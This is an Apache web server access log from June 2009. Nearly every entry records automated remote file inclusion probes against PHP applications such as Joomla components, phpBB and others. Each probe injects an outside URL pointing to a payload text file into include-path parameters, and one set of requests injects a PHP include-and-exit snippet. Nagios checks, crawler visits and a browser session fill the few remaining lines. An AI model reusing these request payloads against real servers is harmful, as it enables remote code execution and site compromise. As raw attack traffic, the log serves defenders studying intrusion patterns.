209.59.12.99 - - [19/Jun/2009:03:47:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.15.254.22 - - [19/Jun/2009:03:47:10 -0400] "GET /logs/access_log.Q109051700%20%20//include/admin.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
78.40.226.135 - - [19/Jun/2009:03:47:13 -0400] "GET /logs/access_log.Q109060700%20%20//?path%5Bdocroot%5D=http://www.barrioarroyodulce.com.ar/media/header.jpg?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
218.38.16.107 - - [19/Jun/2009:03:47:25 -0400] "GET /logs/access_log.Q109060900%20%20/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
201.232.54.48 - - [19/Jun/2009:03:47:32 -0400] "GET /logs/access_log.Q109060700%20%20///?path%5Bdocroot%5D=http://kudacuki.ucoz.com/id1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:03:47:33 -0400] "GET /logs/access_log.Q109061300///?path%5Bdocroot%5D=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:03:47:46 -0400] "GET /logs/access_log.Q109061300///?path%5Bdocroot%5D=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
121.15.254.22 - - [19/Jun/2009:03:47:58 -0400] "GET /logs/access_log.Q109061200%20%20/lostpasswd.php?env[include_prefix]=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:03:48:00 -0400] "GET /logs/access_log.Q109060900%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
38.99.13.118 - - [19/Jun/2009:03:48:07 -0400] "GET /logs/access_log.Q107052400 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
78.40.226.135 - - [19/Jun/2009:03:48:08 -0400] "GET //?path%5Bdocroot%5D=http://yildizmotor.net/images/header.jpg?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
195.34.78.110 - - [19/Jun/2009:03:48:09 -0400] "GET //INFO_WAMP/errors.php?error=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
195.34.78.110 - - [19/Jun/2009:03:48:11 -0400] "GET /logs//INFO_WAMP/errors.php?error=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
195.34.78.110 - - [19/Jun/2009:03:48:11 -0400] "GET /logs/access_log.Q109052900//INFO_WAMP/errors.php?error=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
121.15.254.22 - - [19/Jun/2009:03:48:11 -0400] "GET /logs/access_log.Q109060600%20%20/lostpasswd.php?env[include_prefix]=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
195.34.78.110 - - [19/Jun/2009:03:48:13 -0400] "GET /logs/access_log.Q109053000//INFO_WAMP/errors.php?error=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
78.40.226.135 - - [19/Jun/2009:03:48:14 -0400] "GET /logs/access_log.Q109060700//?path%5Bdocroot%5D=http://yildizmotor.net/images/header.jpg?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
78.40.226.135 - - [19/Jun/2009:03:48:14 -0400] "GET /logs//?path%5Bdocroot%5D=http://yildizmotor.net/images/header.jpg?? HTTP/1.1" 200 6113 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:03:48:16 -0400] "GET /logs/access_log.Q109060700%20%20//?path%5Bdocroot%5D=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
78.40.226.135 - - [19/Jun/2009:03:48:19 -0400] "GET /logs/access_log.Q109060700//?path%5Bdocroot%5D=http://www.barrioarroyodulce.com.ar/media/header.jpg?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
78.40.226.135 - - [19/Jun/2009:03:48:19 -0400] "GET //?path%5Bdocroot%5D=http://www.barrioarroyodulce.com.ar/media/header.jpg?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
78.40.226.135 - - [19/Jun/2009:03:48:19 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.barrioarroyodulce.com.ar/media/header.jpg?? HTTP/1.1" 200 6113 "-" "Mozilla/5.0"
195.34.78.110 - - [19/Jun/2009:03:48:21 -0400] "GET //INFO_WAMP/errors.php?error=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
195.34.78.110 - - [19/Jun/2009:03:48:21 -0400] "GET /logs//INFO_WAMP/errors.php?error=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
195.34.78.110 - - [19/Jun/2009:03:48:21 -0400] "GET /logs/access_log.Q109052900//INFO_WAMP/errors.php?error=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
195.34.78.110 - - [19/Jun/2009:03:48:24 -0400] "GET /logs/access_log.Q109053000//INFO_WAMP/errors.php?error=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
211.43.202.66 - - [19/Jun/2009:03:48:34 -0400] "GET /logs/access_log.Q109050300//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
78.40.226.135 - - [19/Jun/2009:03:48:37 -0400] "GET //?path%5Bdocroot%5D=http://www.barrioarroyodulce.com.ar/media/header.jpg?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
78.40.226.135 - - [19/Jun/2009:03:48:37 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.barrioarroyodulce.com.ar/media/header.jpg?? HTTP/1.1" 200 6113 "-" "Mozilla/5.0"
78.40.226.135 - - [19/Jun/2009:03:48:38 -0400] "GET /logs/access_log.Q109060700//?path%5Bdocroot%5D=http://www.barrioarroyodulce.com.ar/media/header.jpg?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
121.165.73.157 - - [19/Jun/2009:03:48:41 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://closeup2.com/components/sex.txt??? HTTP/1.1" 404 229 "-" "libwww-perl/5.805"
121.165.73.157 - - [19/Jun/2009:03:48:41 -0400] "GET //include/admin.lib.inc.php?site_path=http://closeup2.com/components/sex.txt??? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
121.165.73.157 - - [19/Jun/2009:03:48:41 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://closeup2.com/components/sex.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
211.43.202.66 - - [19/Jun/2009:03:48:44 -0400] "GET /logs/access_log.Q109060500//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
121.165.73.157 - - [19/Jun/2009:03:48:56 -0400] "GET /logs/access_log.Q109051700//include/admin.lib.inc.php?site_path=http://closeup2.com/components/sex.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
123.143.98.5 - - [19/Jun/2009:03:49:03 -0400] "GET /logs/access_log.Q109060900/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
211.49.99.7 - - [19/Jun/2009:03:49:19 -0400] "GET /logs/access_log.Q109060800/includes/class_item.php?fileExtension=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
211.49.99.7 - - [19/Jun/2009:03:49:19 -0400] "GET /includes/class_item.php?fileExtension=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
211.49.99.7 - - [19/Jun/2009:03:49:21 -0400] "GET /logs/includes/class_item.php?fileExtension=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
67.208.139.72 - - [19/Jun/2009:03:49:25 -0400] "GET /logs/access_log.Q109051700//include/admin.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
83.98.209.71 - - [19/Jun/2009:03:49:37 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=04_america&act=vote&no=17&page=&search_mode=&search_word=&cid=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:03:49:43 -0400] "GET /logs/access_log.Q109052100%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:03:50:10 -0400] "GET /logs/access_log.Q109060900%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:03:50:13 -0400] "GET /logs/access_log.Q109052100/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:03:50:45 -0400] "GET /logs/access_log.Q109060900/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
78.40.226.135 - - [19/Jun/2009:03:50:53 -0400] "GET /logs/access_log.Q109060900//?path%5Bdocroot%5D=http://yildizmotor.net/images/header.jpg?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
203.146.102.38 - - [19/Jun/2009:03:51:07 -0400] "GET /logs/?REX[INCLUDE_PATH]=http://www.x-pronet.com/board/test.txt??? HTTP/1.1" 200 6108 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
203.146.102.38 - - [19/Jun/2009:03:51:07 -0400] "GET /?REX[INCLUDE_PATH]=http://www.x-pronet.com/board/test.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
124.217.216.86 - - [19/Jun/2009:03:51:18 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://vpk66.ru/images/stories/idd.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.826"
124.217.216.86 - - [19/Jun/2009:03:51:18 -0400] "GET //include/admin.lib.inc.php?site_path=http://vpk66.ru/images/stories/idd.txt??? HTTP/1.1" 404 224 "-" "libwww-perl/5.826"
124.217.216.86 - - [19/Jun/2009:03:51:19 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://vpk66.ru/images/stories/idd.txt??? HTTP/1.1" 404 229 "-" "libwww-perl/5.826"
203.94.155.59 - - [19/Jun/2009:03:51:23 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.wfc.edu.tw/~ecsec/xxup/news/readme.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:03:51:23 -0400] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.wfc.edu.tw/~ecsec/xxup/news/readme.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:03:51:23 -0400] "GET /logs/access_log.Q109053100//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.wfc.edu.tw/~ecsec/xxup/news/readme.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
78.40.226.135 - - [19/Jun/2009:03:51:23 -0400] "GET /logs/access_log.Q109060900//?path%5Bdocroot%5D=http://www.barrioarroyodulce.com.ar/media/header.jpg?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:03:51:33 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.wfc.edu.tw/~ecsec/xxup/news/readme.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:03:51:33 -0400] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.wfc.edu.tw/~ecsec/xxup/news/readme.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
74.55.29.146 - - [19/Jun/2009:03:51:35 -0400] "GET /logs/access_log.Q109051500/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:03:51:36 -0400] "GET /logs/access_log.Q109053100//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.wfc.edu.tw/~ecsec/xxup/news/readme.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
78.40.226.135 - - [19/Jun/2009:03:51:40 -0400] "GET /logs/access_log.Q109060900//?path%5Bdocroot%5D=http://www.barrioarroyodulce.com.ar/media/header.jpg?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
209.59.12.99 - - [19/Jun/2009:03:52:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.94.155.59 - - [19/Jun/2009:03:52:08 -0400] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.wfc.edu.tw/~ecsec/xxup/news/readme.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:03:52:08 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.wfc.edu.tw/~ecsec/xxup/news/readme.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:03:52:08 -0400] "GET /logs/access_log.Q109053100%20%20//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.wfc.edu.tw/~ecsec/xxup/news/readme.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.249.71.14 - - [19/Jun/2009:03:53:19 -0400] "GET /images/9600305_full.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
94.23.200.54 - - [19/Jun/2009:03:53:23 -0400] "GET /logs/access_log.Q109060700///?path%5Bdocroot%5D=http://www.harzer-nachrichten.de///userimages/sub/fx29id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:03:53:43 -0400] "GET /logs/access_log.Q109053100//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:03:53:43 -0400] "GET //index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:03:53:43 -0400] "GET /logs//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
124.217.216.86 - - [19/Jun/2009:03:53:44 -0400] "GET /logs/access_log.Q109051700//include/admin.lib.inc.php?site_path=http://vpk66.ru/images/stories/idd.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.826"
94.23.200.54 - - [19/Jun/2009:03:53:48 -0400] "GET /logs/access_log.Q109060900///?path%5Bdocroot%5D=http://www.harzer-nachrichten.de///userimages/sub/fx29id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:03:53:51 -0400] "GET /logs/access_log.Q109052200//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.55.29.146 - - [19/Jun/2009:03:53:58 -0400] "GET /logs/access_log.Q109052200//include/lib.inc.php?site_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
74.55.29.146 - - [19/Jun/2009:03:54:03 -0400] "GET /logs/access_log.Q109050900//include/lib.inc.php?site_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
38.99.13.118 - - [19/Jun/2009:03:54:10 -0400] "GET /logs/error_log.Q107082000 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
78.40.226.135 - - [19/Jun/2009:03:54:45 -0400] "GET /logs/access_log.Q109060700//?path%5Bdocroot%5D=http://yildizmotor.net/images/header.jpg?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
78.40.226.135 - - [19/Jun/2009:03:54:45 -0400] "GET //?path%5Bdocroot%5D=http://yildizmotor.net/images/header.jpg?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
78.40.226.135 - - [19/Jun/2009:03:54:45 -0400] "GET /logs//?path%5Bdocroot%5D=http://yildizmotor.net/images/header.jpg?? HTTP/1.1" 200 6113 "-" "Mozilla/5.0"
78.40.226.135 - - [19/Jun/2009:03:54:50 -0400] "GET /logs/access_log.Q109060700//?path%5Bdocroot%5D=http://www.barrioarroyodulce.com.ar/media/header.jpg?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
78.40.226.135 - - [19/Jun/2009:03:54:50 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.barrioarroyodulce.com.ar/media/header.jpg?? HTTP/1.1" 200 6113 "-" "Mozilla/5.0"
121.165.73.157 - - [19/Jun/2009:03:54:50 -0400] "GET /logs/access_log.Q109050700%20//include/admin.lib.inc.php?site_path=http://closeup2.com/components/sex.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
78.40.226.135 - - [19/Jun/2009:03:54:55 -0400] "GET //?path%5Bdocroot%5D=http://www.barrioarroyodulce.com.ar/media/header.jpg?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
78.40.226.135 - - [19/Jun/2009:03:54:55 -0400] "GET /logs/access_log.Q109060700//?path%5Bdocroot%5D=http://www.barrioarroyodulce.com.ar/media/header.jpg?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
78.40.226.135 - - [19/Jun/2009:03:54:55 -0400] "GET //?path%5Bdocroot%5D=http://www.barrioarroyodulce.com.ar/media/header.jpg?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
78.40.226.135 - - [19/Jun/2009:03:55:00 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.barrioarroyodulce.com.ar/media/header.jpg?? HTTP/1.1" 200 6113 "-" "Mozilla/5.0"
195.34.78.110 - - [19/Jun/2009:03:55:52 -0400] "GET /n/INFO_WAMP/errors.php?error=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
195.34.78.110 - - [19/Jun/2009:03:55:52 -0400] "GET /logs/access_log.Q109052900/n/INFO_WAMP/errors.php?error=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
195.34.78.110 - - [19/Jun/2009:03:55:52 -0400] "GET /logs/n/INFO_WAMP/errors.php?error=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
195.34.78.110 - - [19/Jun/2009:03:56:01 -0400] "GET /n/INFO_WAMP/errors.php?error=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
195.34.78.110 - - [19/Jun/2009:03:56:01 -0400] "GET /logs/n/INFO_WAMP/errors.php?error=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
195.34.78.110 - - [19/Jun/2009:03:56:01 -0400] "GET /logs/access_log.Q109052900/n/INFO_WAMP/errors.php?error=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
195.34.78.110 - - [19/Jun/2009:03:56:10 -0400] "GET /logs/access_log.Q109053000/n/INFO_WAMP/errors.php?error=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
195.34.78.110 - - [19/Jun/2009:03:56:17 -0400] "GET /logs/access_log.Q109053000/n/INFO_WAMP/errors.php?error=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
121.15.254.22 - - [19/Jun/2009:03:56:27 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
121.15.254.22 - - [19/Jun/2009:03:56:27 -0400] "GET /logs/access_log.Q109052800/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
121.15.254.22 - - [19/Jun/2009:03:56:27 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
121.15.254.22 - - [19/Jun/2009:03:56:48 -0400] "GET /logs/access_log.Q109052600/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
89.186.1.54 - - [19/Jun/2009:03:58:08 -0400] "GET /logs/access_log.Q109053100//?phpbb_root_path=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
216.117.128.143 - - [19/Jun/2009:03:58:24 -0400] "GET /logs/access_log.Q109051700//include/admin.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
78.40.226.135 - - [19/Jun/2009:03:58:26 -0400] "GET /logs/access_log.Q109061300//?path%5Bdocroot%5D=http://yildizmotor.net/images/header.jpg?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
89.186.1.54 - - [19/Jun/2009:03:58:27 -0400] "GET /logs/access_log.Q109052200//?phpbb_root_path=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
78.40.226.135 - - [19/Jun/2009:03:58:31 -0400] "GET /logs/access_log.Q109061300//?path%5Bdocroot%5D=http://www.barrioarroyodulce.com.ar/media/header.jpg?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
78.40.226.135 - - [19/Jun/2009:03:58:31 -0400] "GET /logs/access_log.Q109061300//?path%5Bdocroot%5D=http://www.barrioarroyodulce.com.ar/media/header.jpg?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
85.72.199.245 - - [19/Jun/2009:03:58:47 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; el; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
85.72.199.245 - - [19/Jun/2009:03:58:47 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; el; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
85.72.199.245 - - [19/Jun/2009:03:58:49 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; el; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
85.72.199.245 - - [19/Jun/2009:03:58:49 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; el; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
121.15.254.22 - - [19/Jun/2009:03:58:58 -0400] "GET /logs/access_log.Q109052800%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
121.15.254.22 - - [19/Jun/2009:03:58:58 -0400] "GET /logs/access_log.Q109052600%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
216.117.128.143 - - [19/Jun/2009:03:59:02 -0400] "GET /logs/access_log.Q109051700//include/admin.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
216.117.128.143 - - [19/Jun/2009:03:59:10 -0400] "GET /logs/access_log.Q109051700//include/admin.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:03:59:36 -0400] "GET ///blog.inc.php?_SERVER[DOCUMENT_ROOT]=http://www.harzer-nachrichten.de///userimages/sub/fx29id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:03:59:36 -0400] "GET /logs///blog.inc.php?_SERVER[DOCUMENT_ROOT]=http://www.harzer-nachrichten.de///userimages/sub/fx29id1.txt??? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:03:59:36 -0400] "GET /logs/access_log.Q109052200%20%20///blog.inc.php?_SERVER[DOCUMENT_ROOT]=http://www.harzer-nachrichten.de///userimages/sub/fx29id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
124.217.216.86 - - [19/Jun/2009:03:59:38 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://vpk66.ru/images/stories/idd.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.826"
124.217.216.86 - - [19/Jun/2009:03:59:39 -0400] "GET //include/admin.lib.inc.php?site_path=http://vpk66.ru/images/stories/idd.txt??? HTTP/1.1" 404 224 "-" "libwww-perl/5.826"
124.217.216.86 - - [19/Jun/2009:03:59:39 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://vpk66.ru/images/stories/idd.txt??? HTTP/1.1" 404 229 "-" "libwww-perl/5.826"
38.99.13.118 - - [19/Jun/2009:03:59:55 -0400] "GET /logs/access_log.Q108110100 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
193.34.167.192 - - [19/Jun/2009:03:59:58 -0400] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://glassmac.com/bbs/data/news/style/roscanid.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.808"
121.15.254.22 - - [19/Jun/2009:04:00:13 -0400] "GET /lostpasswd.php?env[include_prefix]=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
121.15.254.22 - - [19/Jun/2009:04:00:13 -0400] "GET /logs/access_log.Q109061200/lostpasswd.php?env[include_prefix]=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
121.15.254.22 - - [19/Jun/2009:04:00:13 -0400] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
